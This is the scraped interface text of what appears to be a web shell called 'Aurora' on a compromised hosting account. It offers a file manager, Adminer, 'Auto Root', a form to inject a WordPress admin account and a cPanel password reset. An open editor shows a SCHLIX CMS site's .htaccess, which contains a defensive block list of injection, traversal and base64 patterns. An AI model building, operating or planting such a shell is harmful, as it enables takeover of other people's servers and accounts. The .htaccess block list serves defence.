Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
var
softaculous
schlix
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: .htaccess
Options -Indexes Options +FollowSymLinks #php_flag short_open_tag off #ErrorDocument 404 /errors/404.html # Protect against iframe attack, add IE11 compatiblity <IfModule mod_headers.c> Header set X-Frame-Options "SAMEORIGIN" Header set X-UA-Compatible "IE=edge,chrome=1" Header set X-XSS-Protection "1; mode=block" </IfModule> <IfModule mod_rewrite.c> RewriteEngine On #RewriteBase / # uncomment and add the root directory, e.g: RewriteBase /testsite - this is problematic on older Apache RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https(%3A|:)(/|%2F){2}(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http(%3A|:)(/|%2F){2}(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./) [OR] RewriteCond %{QUERY_STRING} ^(.*)(%3C|<)/?script(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)document\.location\.href(.*)$ [OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|exec|script|set|meta|truncate|encode) [NC] RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$ RewriteRule ^(.*)$ - [F,L] RewriteCond %{REQUEST_URI} (/|\.htm|\.xhtml|\.html|\.*|/[^.]*)$ [NC] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$ RewriteRule (.*) index.php # # Below is one of many examples of how to automatically redirect all traffic to # to always use SSL port for better privacy and security # The example below is only for a single site, not a multi-site. # It also contains some exception for SSL Domain-Control Validation # #RewriteCond %{SERVER_PORT} 80 #RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ #RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ #RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$ ##### use this if you have multi-sites #RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R] ##### use this if you want to redirect all to a single address - either with www or non-www #RewriteRule ^(.*)$ https://%www.yourwebsite.com%{REQUEST_URI} [L,R] # ErrorDocument 400 httperror/400.html # ErrorDocument 401 httperror/401.html # ErrorDocument 403 httperror/403.html ErrorDocument 404 httperror/404.html # ErrorDocument 405 httperror/405.html # ErrorDocument 406 httperror/406.html # ErrorDocument 407 httperror/407.html # ErrorDocument 408 httperror/408.html # ErrorDocument 409 httperror/409.html # ErrorDocument 410 httperror/410.html # ErrorDocument 411 httperror/411.html # ErrorDocument 412 httperror/412.html # ErrorDocument 413 httperror/413.html # ErrorDocument 414 httperror/414.html # ErrorDocument 415 httperror/415.html # ErrorDocument 500 httperror/500.html </IfModule> # Speed up SCHLIX CMS by compressing text, html, javascript, css, xml: <IfModule mod_filter.c> <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE application/xml AddOutputFilterByType DEFLATE application/xhtml+xml AddOutputFilterByType DEFLATE application/rss+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/x-javascript AddOutputFilterByType DEFLATE text/javascript # Exception: Images, static files, PDF, MP3, etc SetEnvIfNoCase REQUEST_URI \.(?:gif|jpg|jpeg|png|mp3|mp4|avi|zip|pdf)$ no-gzip dont-vary # Drop problematic browsers BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html <IfModule mod_headers.c> Header append Vary User-Agent env=!dont-vary </IfModule> </IfModule> </IfModule> # Loading pre-compressed Javascript files have been disabled for the time being # as of v2.1.6-4 # #<FilesMatch "(\.js\.gz|\.css\.gz)$"> # AddEncoding gzip gz # ForceType text/javascript # Options +Multiviews # SetEnv force-no-vary # <IfModule mod_headers.c> # Header set Cache-Control "private" # </IfModule> #</FilesMatch>